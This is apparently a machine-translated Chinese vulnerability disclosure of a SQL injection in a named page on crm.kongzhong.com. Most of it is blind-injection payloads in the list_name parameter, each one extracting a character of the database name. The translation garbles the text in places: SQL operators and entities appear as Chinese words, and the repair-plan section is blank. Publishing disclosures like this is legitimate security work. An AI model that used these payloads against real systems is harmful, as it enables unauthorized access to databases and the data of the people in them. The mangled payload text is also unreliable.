漏洞标题 空中网一站SQL注入 相关制造商 空中网络 漏洞作者 过路人 提交时间 2016-05-04 09: 14 公共时间 2016-06-18 10: 40 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注射 漏洞详细信息 http://crm.kongzhong.com/subscribe.php Email=50＆amp; flag=37＆amp; list_name=1＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit=Report＆amp; unsub_type=flag＆amp; unsubscribe_cause=1

漏洞证明： 邮件列表 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（1）for（1）））=109＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（2）for（1）））=97＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（3）for（1）））=105＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（4）for（1）））=108＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（5）for（1）））=108＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（6）for（1）））=105＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（7）for（1）））=115＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 Email=50＆amp; flag=37＆amp; list_name=-7034'或ascii（mid（database（）from（8）for（1）））=116＃＆amp; list_request=unsubscribe＆amp; rem_warn=1＆amp; submit= ＆安培; unsub_type=标志＆安培; unsubscribe_cause=1 修理计划： 版权声明：请注明出处。居民A @乌云